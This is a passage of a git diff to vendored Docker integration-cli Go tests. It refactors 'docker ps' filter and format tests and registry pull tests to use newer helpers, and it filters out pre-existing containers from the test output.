-// Test for GitHub issue #21772
-func (s *DockerSuite) TestPsNamesMultipleTime(c *check.C) {
-	runSleepingContainer(c, "--name=test1")
-	runSleepingContainer(c, "--name=test2")
-
-	//use the new format capabilities to list the names twice
-	out, _ := dockerCmd(c, "ps", "--format", "{{.Names}} {{.Names}}")
-	lines := strings.Split(strings.TrimSpace(string(out)), "\n")
-	expected := []string{"test2 test2", "test1 test1"}
-	var names []string
-	names = append(names, lines...)
-	c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with names displayed twice: %v, got: %v", expected, names))
-}
-
-func (s *DockerSuite) TestPsFormatHeaders(c *check.C) {
-	// make sure no-container "docker ps" still prints the header row
-	out, _ := dockerCmd(c, "ps", "--format", "table {{.ID}}")
-	c.Assert(out, checker.Equals, "CONTAINER ID\n", check.Commentf(`Expected 'CONTAINER ID\n', got %v`, out))
-
-	// verify that "docker ps" with a container still prints the header row also
-	runSleepingContainer(c, "--name=test")
-	out, _ = dockerCmd(c, "ps", "--format", "table {{.Names}}")
-	c.Assert(out, checker.Equals, "NAMES\ntest\n", check.Commentf(`Expected 'NAMES\ntest\n', got %v`, out))
-}
-
-func (s *DockerSuite) TestPsDefaultFormatAndQuiet(c *check.C) {
-	config := `{
-		"psFormat": "default {{ .ID }}"
-}`
-	d, err := ioutil.TempDir("", "integration-cli-")
-	c.Assert(err, checker.IsNil)
-	defer os.RemoveAll(d)
-
-	err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644)
-	c.Assert(err, checker.IsNil)
-
-	out, _ := runSleepingContainer(c, "--name=test")
-	id := strings.TrimSpace(out)
-
-	out, _ = dockerCmd(c, "--config", d, "ps", "-q")
-	c.Assert(id, checker.HasPrefix, strings.TrimSpace(out), check.Commentf("Expected to print only the container id, got %v\n", out))
-}
-
 // Test for GitHub issue #12595
 func (s *DockerSuite) TestPsImageIDAfterUpdate(c *check.C) {
 	// TODO: Investigate why this fails on Windows to Windows CI further.
@@ -669,22 +550,21 @@ func (s *DockerSuite) TestPsImageIDAfterUpdate(c *check.C) {
 	originalImageName := "busybox:TestPsImageIDAfterUpdate-original"
 	updatedImageName := "busybox:TestPsImageIDAfterUpdate-updated"
 
-	runCmd := exec.Command(dockerBinary, "tag", "busybox:latest", originalImageName)
-	out, _, err := runCommandWithOutput(runCmd)
-	c.Assert(err, checker.IsNil)
+	existingContainers := ExistingContainerIDs(c)
 
-	originalImageID, err := getIDByName(originalImageName)
-	c.Assert(err, checker.IsNil)
+	icmd.RunCommand(dockerBinary, "tag", "busybox:latest", originalImageName).Assert(c, icmd.Success)
 
-	runCmd = exec.Command(dockerBinary, append([]string{"run", "-d", originalImageName}, sleepCommandForDaemonPlatform()...)...)
-	out, _, err = runCommandWithOutput(runCmd)
-	c.Assert(err, checker.IsNil)
-	containerID := strings.TrimSpace(out)
+	originalImageID := getIDByName(c, originalImageName)
 
-	linesOut, err := exec.Command(dockerBinary, "ps", "--no-trunc").CombinedOutput()
-	c.Assert(err, checker.IsNil)
+	result := icmd.RunCommand(dockerBinary, append([]string{"run", "-d", originalImageName}, sleepCommandForDaemonPlatform()...)...)
+	result.Assert(c, icmd.Success)
+	containerID := strings.TrimSpace(result.Combined())
+
+	result = icmd.RunCommand(dockerBinary, "ps", "--no-trunc")
+	result.Assert(c, icmd.Success)
 
-	lines := strings.Split(strings.TrimSpace(string(linesOut)), "\n")
+	lines := strings.Split(strings.TrimSpace(string(result.Combined())), "\n")
+	lines = RemoveLinesForExistingElements(lines, existingContainers)
 	// skip header
 	lines = lines[1:]
 	c.Assert(len(lines), checker.Equals, 1)
@@ -694,18 +574,14 @@ func (s *DockerSuite) TestPsImageIDAfterUpdate(c *check.C) {
 		c.Assert(f[1], checker.Equals, originalImageName)
 	}
 
-	runCmd = exec.Command(dockerBinary, "commit", containerID, updatedImageName)
-	out, _, err = runCommandWithOutput(runCmd)
-	c.Assert(err, checker.IsNil)
-
-	runCmd = exec.Command(dockerBinary, "tag", updatedImageName, originalImageName)
-	out, _, err = runCommandWithOutput(runCmd)
-	c.Assert(err, checker.IsNil)
+	icmd.RunCommand(dockerBinary, "commit", containerID, updatedImageName).Assert(c, icmd.Success)
+	icmd.RunCommand(dockerBinary, "tag", updatedImageName, originalImageName).Assert(c, icmd.Success)
 
-	linesOut, err = exec.Command(dockerBinary, "ps", "--no-trunc").CombinedOutput()
-	c.Assert(err, checker.IsNil)
+	result = icmd.RunCommand(dockerBinary, "ps", "--no-trunc")
+	result.Assert(c, icmd.Success)
 
-	lines = strings.Split(strings.TrimSpace(string(linesOut)), "\n")
+	lines = strings.Split(strings.TrimSpace(string(result.Combined())), "\n")
+	lines = RemoveLinesForExistingElements(lines, existingContainers)
 	// skip header
 	lines = lines[1:]
 	c.Assert(len(lines), checker.Equals, 1)
@@ -736,6 +612,8 @@ func (s *DockerSuite) TestPsNotShowPortsOfStoppedContainer(c *check.C) {
 }
 
 func (s *DockerSuite) TestPsShowMounts(c *check.C) {
+	existingContainers := ExistingContainerNames(c)
+
 	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
 
 	mp := prefix + slash + "test"
@@ -749,7 +627,7 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) {
 	// bind mount container
 	var bindMountSource string
 	var bindMountDestination string
-	if DaemonIsWindows.Condition() {
+	if DaemonIsWindows() {
 		bindMountSource = "c:\\"
 		bindMountDestination = "c:\\t"
 	} else {
@@ -762,6 +640,7 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) {
 	out, _ := dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}")
 
 	lines := strings.Split(strings.TrimSpace(string(out)), "\n")
+	lines = RemoveLinesForExistingElements(lines, existingContainers)
 	c.Assert(lines, checker.HasLen, 3)
 
 	fields := strings.Fields(lines[0])
@@ -772,7 +651,7 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) {
 	fields = strings.Fields(lines[1])
 	c.Assert(fields, checker.HasLen, 2)
 
-	annonymounsVolumeID := fields[1]
+	anonymousVolumeID := fields[1]
 
 	fields = strings.Fields(lines[2])
 	c.Assert(fields[1], checker.Equals, "ps-volume-test")
@@ -781,6 +660,7 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) {
 	out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume=ps-volume-test")
 
 	lines = strings.Split(strings.TrimSpace(string(out)), "\n")
+	lines = RemoveLinesForExistingElements(lines, existingContainers)
 	c.Assert(lines, checker.HasLen, 1)
 
 	fields = strings.Fields(lines[0])
@@ -794,10 +674,11 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) {
 	out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume="+mp)
 
 	lines = strings.Split(strings.TrimSpace(string(out)), "\n")
+	lines = RemoveLinesForExistingElements(lines, existingContainers)
 	c.Assert(lines, checker.HasLen, 2)
 
 	fields = strings.Fields(lines[0])
-	c.Assert(fields[1], checker.Equals, annonymounsVolumeID)
+	c.Assert(fields[1], checker.Equals, anonymousVolumeID)
 	fields = strings.Fields(lines[1])
 	c.Assert(fields[1], checker.Equals, "ps-volume-test")
 
@@ -805,6 +686,7 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) {
 	out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume="+bindMountSource)
 
 	lines = strings.Split(strings.TrimSpace(string(out)), "\n")
+	lines = RemoveLinesForExistingElements(lines, existingContainers)
 	c.Assert(lines, checker.HasLen, 1)
 
 	fields = strings.Fields(lines[0])
@@ -816,6 +698,7 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) {
 	out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume="+bindMountDestination)
 
 	lines = strings.Split(strings.TrimSpace(string(out)), "\n")
+	lines = RemoveLinesForExistingElements(lines, existingContainers)
 	c.Assert(lines, checker.HasLen, 1)
 
 	fields = strings.Fields(lines[0])
@@ -828,24 +711,9 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) {
 	c.Assert(strings.TrimSpace(string(out)), checker.HasLen, 0)
 }
 
-func (s *DockerSuite) TestPsFormatSize(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-	runSleepingContainer(c)
-
-	out, _ := dockerCmd(c, "ps", "--format", "table {{.Size}}")
-	lines := strings.Split(out, "\n")
-	c.Assert(lines[1], checker.Not(checker.Equals), "0 B", check.Commentf("Should not display a size of 0 B"))
-
-	out, _ = dockerCmd(c, "ps", "--size", "--format", "table {{.Size}}")
-	lines = strings.Split(out, "\n")
-	c.Assert(lines[0], checker.Equals, "SIZE", check.Commentf("Should only have one size column"))
-
-	out, _ = dockerCmd(c, "ps", "--size", "--format", "raw")
-	lines = strings.Split(out, "\n")
-	c.Assert(lines[8], checker.HasPrefix, "size:", check.Commentf("Size should be appended on a newline"))
-}
-
 func (s *DockerSuite) TestPsListContainersFilterNetwork(c *check.C) {
+	existing := ExistingContainerIDs(c)
+
 	// TODO default network on Windows is not called "bridge", and creating a
 	// custom network fails on Windows fails with "Error response from daemon: plugin not found")
 	testRequires(c, DaemonIsLinux)
@@ -863,7 +731,7 @@ func (s *DockerSuite) TestPsListContainersFilterNetwork(c *check.C) {
 	lines = lines[1:]
 
 	// ps output should have no containers
-	c.Assert(lines, checker.HasLen, 0)
+	c.Assert(RemoveLinesForExistingElements(lines, existing), checker.HasLen, 0)
 
 	// Filter docker ps on network bridge
 	out, _ = dockerCmd(c, "ps", "--filter", "network=bridge")
@@ -875,7 +743,7 @@ func (s *DockerSuite) TestPsListContainersFilterNetwork(c *check.C) {
 	lines = lines[1:]
 
 	// ps output should have only one container
-	c.Assert(lines, checker.HasLen, 1)
+	c.Assert(RemoveLinesForExistingElements(lines, existing), checker.HasLen, 1)
 
 	// Making sure onbridgenetwork is on the output
 	c.Assert(containerOut, checker.Contains, "onbridgenetwork", check.Commentf("Missing the container on network\n"))
@@ -890,7 +758,7 @@ func (s *DockerSuite) TestPsListContainersFilterNetwork(c *check.C) {
 	lines = lines[1:]
 
 	//ps output should have both the containers
-	c.Assert(lines, checker.HasLen, 2)
+	c.Assert(RemoveLinesForExistingElements(lines, existing), checker.HasLen, 2)
 
 	// Making sure onbridgenetwork and onnonenetwork is on the output
 	c.Assert(containerOut, checker.Contains, "onnonenetwork", check.Commentf("Missing the container on none network\n"))
@@ -903,50 +771,104 @@ func (s *DockerSuite) TestPsListContainersFilterNetwork(c *check.C) {
 	containerOut = strings.TrimSpace(string(out))
 
 	c.Assert(containerOut, checker.Contains, "onbridgenetwork")
+
+	// Filter by partial network ID
+	partialnwID := string(nwID[0:4])
+
+	out, _ = dockerCmd(c, "ps", "--filter", "network="+partialnwID)
+	containerOut = strings.TrimSpace(string(out))
+
+	lines = strings.Split(containerOut, "\n")
+
+	// skip header
+	lines = lines[1:]
+
+	// ps output should have only one container
+	c.Assert(RemoveLinesForExistingElements(lines, existing), checker.HasLen, 1)
+
+	// Making sure onbridgenetwork is on the output
+	c.Assert(containerOut, checker.Contains, "onbridgenetwork", check.Commentf("Missing the container on network\n"))
+
 }
 
 func (s *DockerSuite) TestPsByOrder(c *check.C) {
 	name1 := "xyz-abc"
-	out, err := runSleepingContainer(c, "--name", name1)
-	c.Assert(err, checker.NotNil)
-	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+	out := runSleepingContainer(c, "--name", name1)
 	container1 := strings.TrimSpace(out)
 
 	name2 := "xyz-123"
-	out, err = runSleepingContainer(c, "--name", name2)
-	c.Assert(err, checker.NotNil)
-	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+	out = runSleepingContainer(c, "--name", name2)
 	container2 := strings.TrimSpace(out)
 
 	name3 := "789-abc"
-	out, err = runSleepingContainer(c, "--name", name3)
-	c.Assert(err, checker.NotNil)
-	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+	out = runSleepingContainer(c, "--name", name3)
 
 	name4 := "789-123"
-	out, err = runSleepingContainer(c, "--name", name4)
-	c.Assert(err, checker.NotNil)
-	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+	out = runSleepingContainer(c, "--name", name4)
 
 	// Run multiple time should have the same result
-	out, err = dockerCmd(c, "ps", "--no-trunc", "-q", "-f", "name=xyz")
-	c.Assert(err, checker.NotNil)
+	out = cli.DockerCmd(c, "ps", "--no-trunc", "-q", "-f", "name=xyz").Combined()
 	c.Assert(strings.TrimSpace(out), checker.Equals, fmt.Sprintf("%s\n%s", container2, container1))
 
 	// Run multiple time should have the same result
-	out, err = dockerCmd(c, "ps", "--no-trunc", "-q", "-f", "name=xyz")
-	c.Assert(err, checker.NotNil)
+	out = cli.DockerCmd(c, "ps", "--no-trunc", "-q", "-f", "name=xyz").Combined()
 	c.Assert(strings.TrimSpace(out), checker.Equals, fmt.Sprintf("%s\n%s", container2, container1))
 }
 
-func (s *DockerSuite) TestPsFilterMissingArgErrorCode(c *check.C) {
-	_, errCode, _ := dockerCmdWithError("ps", "--filter")
-	c.Assert(errCode, checker.Equals, 125)
+func (s *DockerSuite) TestPsListContainersFilterPorts(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	existingContainers := ExistingContainerIDs(c)
+
+	out, _ := dockerCmd(c, "run", "-d", "--publish=80", "busybox", "top")
+	id1 := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "run", "-d", "--expose=8080", "busybox", "top")
+	id2 := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "ps", "--no-trunc", "-q")
+	c.Assert(strings.TrimSpace(out), checker.Contains, id1)
+	c.Assert(strings.TrimSpace(out), checker.Contains, id2)
+
+	out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter", "publish=80-8080/udp")
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), id1)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), id2)
+
+	out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter", "expose=8081")
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), id1)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), id2)
+
+	out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter", "publish=80-81")
+	c.Assert(strings.TrimSpace(out), checker.Equals, id1)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), id2)
+
+	out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter", "expose=80/tcp")
+	c.Assert(strings.TrimSpace(out), checker.Equals, id1)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), id2)
+
+	out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter", "expose=8080/tcp")
+	out = RemoveOutputForExistingElements(out, existingContainers)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), id1)
+	c.Assert(strings.TrimSpace(out), checker.Equals, id2)
 }
 
-// Test case for 30291
-func (s *DockerSuite) TestPsFormatTemplateWithArg(c *check.C) {
-	runSleepingContainer(c, "-d", "--name", "top", "--label", "some.label=label.foo-bar")
-	out, _ := dockerCmd(c, "ps", "--format", `{{.Names}} {{.Label "some.label"}}`)
-	c.Assert(strings.TrimSpace(out), checker.Equals, "top label.foo-bar")
+func (s *DockerSuite) TestPsNotShowLinknamesOfDeletedContainer(c *check.C) {
+	testRequires(c, DaemonIsLinux, MinimumAPIVersion("1.31"))
+	existingContainers := ExistingContainerNames(c)
+
+	dockerCmd(c, "create", "--name=aaa", "busybox", "top")
+	dockerCmd(c, "create", "--name=bbb", "--link=aaa", "busybox", "top")
+
+	out, _ := dockerCmd(c, "ps", "--no-trunc", "-a", "--format", "{{.Names}}")
+	lines := strings.Split(strings.TrimSpace(string(out)), "\n")
+	lines = RemoveLinesForExistingElements(lines, existingContainers)
+	expected := []string{"bbb", "aaa,bbb/aaa"}
+	var names []string
+	names = append(names, lines...)
+	c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with non-truncated names: %v, got: %v", expected, names))
+
+	dockerCmd(c, "rm", "bbb")
+
+	out, _ = dockerCmd(c, "ps", "--no-trunc", "-a", "--format", "{{.Names}}")
+	out = RemoveOutputForExistingElements(out, existingContainers)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "aaa")
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go
index cb14c2c702..33d4ae5e7c 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go
@@ -5,18 +5,19 @@ import (
 	"fmt"
 	"io/ioutil"
 	"os"
-	"os/exec"
 	"path/filepath"
 	"runtime"
 	"strings"
 
 	"github.com/docker/distribution"
-	"github.com/docker/distribution/digest"
 	"github.com/docker/distribution/manifest"
 	"github.com/docker/distribution/manifest/manifestlist"
 	"github.com/docker/distribution/manifest/schema2"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli/build"
 	"github.com/go-check/check"
+	"github.com/opencontainers/go-digest"
+	"gotest.tools/icmd"
 )
 
 // testPullImageWithAliases pulls a specific image tag and verifies that any aliases (i.e., other
@@ -26,7 +27,7 @@ import (
 func testPullImageWithAliases(c *check.C) {
 	repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL)
 
-	repos := []string{}
+	var repos []string
 	for _, tag := range []string{"recent", "fresh"} {
 		repos = append(repos, fmt.Sprintf("%v:%v", repoName, tag))
 	}
@@ -62,17 +63,16 @@ func (s *DockerSchema1RegistrySuite) TestPullImageWithAliases(c *check.C) {
 func testConcurrentPullWholeRepo(c *check.C) {
 	repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL)
 
-	repos := []string{}
+	var repos []string
 	for _, tag := range []string{"recent", "fresh", "todays"} {
 		repo := fmt.Sprintf("%v:%v", repoName, tag)
-		_, err := buildImage(repo, fmt.Sprintf(`
+		buildImageSuccessfully(c, repo, build.WithDockerfile(fmt.Sprintf(`
 		    FROM busybox
 		    ENTRYPOINT ["/bin/echo"]
 		    ENV FOO foo
 		    ENV BAR bar
 		    CMD echo %s
-		`, repo), true)
-		c.Assert(err, checker.IsNil)
+		`, repo)))
 		dockerCmd(c, "push", repo)
 		repos = append(repos, repo)
 	}
@@ -87,8 +87,8 @@ func testConcurrentPullWholeRepo(c *check.C) {
 
 	for i := 0; i != numPulls; i++ {
 		go func() {
-			_, _, err := runCommandWithOutput(exec.Command(dockerBinary, "pull", "-a", repoName))
-			results <- err
+			result := icmd.RunCommand(dockerBinary, "pull", "-a", repoName)
+			results <- result.Error
 		}()
 	}
 
@@ -125,8 +125,8 @@ func testConcurrentFailingPull(c *check.C) {
 
 	for i := 0; i != numPulls; i++ {
 		go func() {
-			_, _, err := runCommandWithOutput(exec.Command(dockerBinary, "pull", repoName+":asdfasdf"))
-			results <- err
+			result := icmd.RunCommand(dockerBinary, "pull", repoName+":asdfasdf")
+			results <- result.Error
 		}()
 	}
 
@@ -151,17 +151,16 @@ func (s *DockerSchema1RegistrySuite) testConcurrentFailingPull(c *check.C) {
 func testConcurrentPullMultipleTags(c *check.C) {
 	repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL)
 
-	repos := []string{}
+	var repos []string
 	for _, tag := range []string{"recent", "fresh", "todays"} {
 		repo := fmt.Sprintf("%v:%v", repoName, tag)
-		_, err := buildImage(repo, fmt.Sprintf(`
+		buildImageSuccessfully(c, repo, build.WithDockerfile(fmt.Sprintf(`
 		    FROM busybox
 		    ENTRYPOINT ["/bin/echo"]
 		    ENV FOO foo
 		    ENV BAR bar
 		    CMD echo %s
-		`, repo), true)
-		c.Assert(err, checker.IsNil)
+		`, repo)))
 		dockerCmd(c, "push", repo)
 		repos = append(repos, repo)
 	}
@@ -175,8 +174,8 @@ func testConcurrentPullMultipleTags(c *check.C) {
 
 	for _, repo := range repos {
 		go func(repo string) {
-			_, _, err := runCommandWithOutput(exec.Command(dockerBinary, "pull", repo))
-			results <- err
+			result := icmd.RunCommand(dockerBinary, "pull", repo)
+			results <- result.Error
 		}(repo)
 	}
 
@@ -209,21 +208,15 @@ func testPullIDStability(c *check.C) {
 	derivedImage := privateRegistryURL + "/dockercli/id-stability"
 	baseImage := "busybox"
 
-	_, err := buildImage(derivedImage, fmt.Sprintf(`
+	buildImageSuccessfully(c, derivedImage, build.WithDockerfile(fmt.Sprintf(`
 	    FROM %s
 	    ENV derived true
 	    ENV asdf true
 	    RUN dd if=/dev/zero of=/file bs=1024 count=1024
 	    CMD echo %s
-	`, baseImage, derivedImage), true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	`, baseImage, derivedImage)))
 
-	originalID, err := getIDByName(derivedImage)
-	if err != nil {
-		c.Fatalf("error inspecting: %v", err)
-	}
+	originalID := getIDByName(c, derivedImage)
 	dockerCmd(c, "push", derivedImage)
 
 	// Pull
@@ -232,10 +225,7 @@ func testPullIDStability(c *check.C) {
 		c.Fatalf("repull redownloaded a layer: %s", out)
 	}
 
-	derivedIDAfterPull, err := getIDByName(derivedImage)
-	if err != nil {
-		c.Fatalf("error inspecting: %v", err)
-	}
+	derivedIDAfterPull := getIDByName(c, derivedImage)
 
 	if derivedIDAfterPull != originalID {
 		c.Fatal("image's ID unexpectedly changed after a repush/repull")
@@ -252,17 +242,11 @@ func testPullIDStability(c *check.C) {
 	dockerCmd(c, "rmi", derivedImage)
 	dockerCmd(c, "pull", derivedImage)
 
-	derivedIDAfterPull, err = getIDByName(derivedImage)
-	if err != nil {
-		c.Fatalf("error inspecting: %v", err)
-	}
+	derivedIDAfterPull = getIDByName(c, derivedImage)
 
 	if derivedIDAfterPull != originalID {
 		c.Fatal("image's ID unexpectedly changed after a repush/repull")
 	}
-	if err != nil {
-		c.Fatalf("error inspecting: %v", err)
-	}
 
 	// Make sure the image still runs
 	out, _ = dockerCmd(c, "run", "--rm", derivedImage)
@@ -283,14 +267,9 @@ func (s *DockerSchema1RegistrySuite) TestPullIDStability(c *check.C) {
 func testPullNoLayers(c *check.C) {
 	repoName := fmt.Sprintf("%v/dockercli/scratch", privateRegistryURL)
 
-	_, err := buildImage(repoName, `
+	buildImageSuccessfully(c, repoName, build.WithDockerfile(`
 	FROM scratch
-	ENV foo bar`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
-
+	ENV foo bar`))
 	dockerCmd(c, "push", repoName)
 	dockerCmd(c, "rmi", repoName)
 	dockerCmd(c, "pull", repoName)
@@ -347,7 +326,7 @@ func (s *DockerRegistrySuite) TestPullManifestList(c *check.C) {
 	manifestListDigest := digest.FromBytes(manifestListJSON)
 	hexDigest := manifestListDigest.Hex()
 
-	registryV2Path := filepath.Join(s.reg.dir, "docker", "registry", "v2")
+	registryV2Path := s.reg.Path()
 
 	// Write manifest list to blob store
 	blobDir := filepath.Join(registryV2Path, "blobs", "sha256", hexDigest[:2], hexDigest)
@@ -411,7 +390,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestPullWithExternalAuthLoginWithSchem
 	err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644)
 	c.Assert(err, checker.IsNil)
 
-	dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL)
+	dockerCmd(c, "--config", tmp, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), privateRegistryURL)
 
 	b, err := ioutil.ReadFile(configPath)
 	c.Assert(err, checker.IsNil)
@@ -421,7 +400,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestPullWithExternalAuthLoginWithSchem
 	dockerCmd(c, "--config", tmp, "push", repoName)
 
 	dockerCmd(c, "--config", tmp, "logout", privateRegistryURL)
-	dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, "https://"+privateRegistryURL)
+	dockerCmd(c, "--config", tmp, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), "https://"+privateRegistryURL)
 	dockerCmd(c, "--config", tmp, "pull", repoName)
 
 	// likewise push should work
@@ -456,7 +435,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestPullWithExternalAuth(c *check.C) {
 	err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644)
 	c.Assert(err, checker.IsNil)
 
-	dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL)
+	dockerCmd(c, "--config", tmp, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), privateRegistryURL)
 
 	b, err := ioutil.ReadFile(configPath)
 	c.Assert(err, checker.IsNil)
@@ -481,12 +460,11 @@ func (s *DockerRegistrySuite) TestRunImplicitPullWithNoTag(c *check.C) {
 	dockerCmd(c, "rmi", repoTag1)
 	dockerCmd(c, "rmi", repoTag2)
 
-	out, _, err := dockerCmdWithError("run", repo)
-	c.Assert(err, check.IsNil)
+	out, _ := dockerCmd(c, "run", repo)
 	c.Assert(out, checker.Contains, fmt.Sprintf("Unable to find image '%s:latest' locally", repo))
 
 	// There should be only one line for repo, the one with repo:latest
-	outImageCmd, _, err := dockerCmdWithError("images", repo)
+	outImageCmd, _ := dockerCmd(c, "images", repo)
 	splitOutImageCmd := strings.Split(strings.TrimSpace(outImageCmd), "\n")
 	c.Assert(splitOutImageCmd, checker.HasLen, 2)
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go
index a0118a8e95..0e88b1e56f 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go
@@ -7,9 +7,9 @@ import (
 	"sync"
 	"time"
 
-	"github.com/docker/distribution/digest"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
+	"github.com/opencontainers/go-digest"
 )
 
 // TestPullFromCentralRegistry pulls an image from the central registry and verifies that the client
@@ -26,7 +26,7 @@ func (s *DockerHubPullSuite) TestPullFromCentralRegistry(c *check.C) {
 	matches := regexp.MustCompile(`Digest: (.+)\n`).FindAllStringSubmatch(out, -1)
 	c.Assert(len(matches), checker.Equals, 1, check.Commentf("expected exactly one image digest in the output"))
 	c.Assert(len(matches[0]), checker.Equals, 2, check.Commentf("unexpected number of submatches for the digest"))
-	_, err := digest.ParseDigest(matches[0][1])
+	_, err := digest.Parse(matches[0][1])
 	c.Check(err, checker.IsNil, check.Commentf("invalid digest %q in output", matches[0][1]))
 
 	// We should have a single entry in images.
@@ -98,11 +98,11 @@ func (s *DockerHubPullSuite) TestPullNonExistingImage(c *check.C) {
 	for record := range recordChan {
 		if len(record.option) == 0 {
 			c.Assert(record.err, checker.NotNil, check.Commentf("expected non-zero exit status when pulling non-existing image: %s", record.out))
-			c.Assert(record.out, checker.Contains, fmt.Sprintf("repository %s not found: does not exist or no pull access", record.e.repo), check.Commentf("expected image not found error messages"))
+			c.Assert(record.out, checker.Contains, fmt.Sprintf("pull access denied for %s, repository does not exist or may require 'docker login'", record.e.repo), check.Commentf("expected image not found error messages"))
 		} else {
 			// pull -a on a nonexistent registry should fall back as well
 			c.Assert(record.err, checker.NotNil, check.Commentf("expected non-zero exit status when pulling non-existing image: %s", record.out))
-			c.Assert(record.out, checker.Contains, fmt.Sprintf("repository %s not found", record.e.repo), check.Commentf("expected image not found error messages"))
+			c.Assert(record.out, checker.Contains, fmt.Sprintf("pull access denied for %s, repository does not exist or may require 'docker login'", record.e.repo), check.Commentf("expected image not found error messages"))
 			c.Assert(record.out, checker.Not(checker.Contains), "unauthorized", check.Commentf(`message should not contain "unauthorized"`))
 		}
 	}
@@ -110,7 +110,7 @@ func (s *DockerHubPullSuite) TestPullNonExistingImage(c *check.C) {
 }
 
 // TestPullFromCentralRegistryImplicitRefParts pulls an image from the central registry and verifies
-// that pulling the same image with different combinations of implicit elements of the the image
+// that pulling the same image with different combinations of implicit elements of the image
 // reference (tag, repository, central registry url, ...) doesn't trigger a new pull nor leads to
 // multiple images.
 func (s *DockerHubPullSuite) TestPullFromCentralRegistryImplicitRefParts(c *check.C) {
@@ -193,25 +193,26 @@ func (s *DockerHubPullSuite) TestPullScratchNotAllowed(c *check.C) {
 // results in more images than a naked pull.
 func (s *DockerHubPullSuite) TestPullAllTagsFromCentralRegistry(c *check.C) {
 	testRequires(c, DaemonIsLinux)
-	s.Cmd(c, "pull", "busybox")
-	outImageCmd := s.Cmd(c, "images", "busybox")
+	s.Cmd(c, "pull", "dockercore/engine-pull-all-test-fixture")
+	outImageCmd := s.Cmd(c, "images", "dockercore/engine-pull-all-test-fixture")
 	splitOutImageCmd := strings.Split(strings.TrimSpace(outImageCmd), "\n")
 	c.Assert(splitOutImageCmd, checker.HasLen, 2)
 
-	s.Cmd(c, "pull", "--all-tags=true", "busybox")
-	outImageAllTagCmd := s.Cmd(c, "images", "busybox")
+	s.Cmd(c, "pull", "--all-tags=true", "dockercore/engine-pull-all-test-fixture")
+	outImageAllTagCmd := s.Cmd(c, "images", "dockercore/engine-pull-all-test-fixture")
 	linesCount := strings.Count(outImageAllTagCmd, "\n")
 	c.Assert(linesCount, checker.GreaterThan, 2, check.Commentf("pulling all tags should provide more than two images, got %s", outImageAllTagCmd))
 
-	// Verify that the line for 'busybox:latest' is left unchanged.
+	// Verify that the line for 'dockercore/engine-pull-all-test-fixture:latest' is left unchanged.
 	var latestLine string
 	for _, line := range strings.Split(outImageAllTagCmd, "\n") {
